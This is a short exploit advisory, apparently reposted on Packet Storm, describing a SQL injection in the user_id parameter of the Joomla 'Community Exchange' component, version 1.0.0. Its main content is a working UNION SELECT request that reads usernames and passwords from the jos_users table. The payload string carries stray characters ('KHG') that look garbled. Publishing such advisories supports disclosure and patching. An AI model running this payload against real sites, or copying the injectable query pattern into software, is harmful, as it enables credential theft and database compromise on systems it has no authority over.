The Joomla Community Exchange component suffers from a remote SQL injection vulnerability.
2d71bd131c0b1d168db5df1fc42848e14eddee697acde552871b95f2b48ea032#############################################################################
# #
# Joomla Component Community Exchange (user_id) SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] ModuleName: "Community Exchange"
[~] Version: "1.0.0"
[~] Author: "Mubashir Ahmad Waqar"
[~] Author E-mail: "contact@intellectcs.com"
[~] Author URL: "www.intellectcs.com"
########################################
[~] Exploit: /index.php?option=com_cx&task=showrating&user_id=[SQL]
[~] Example: /index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed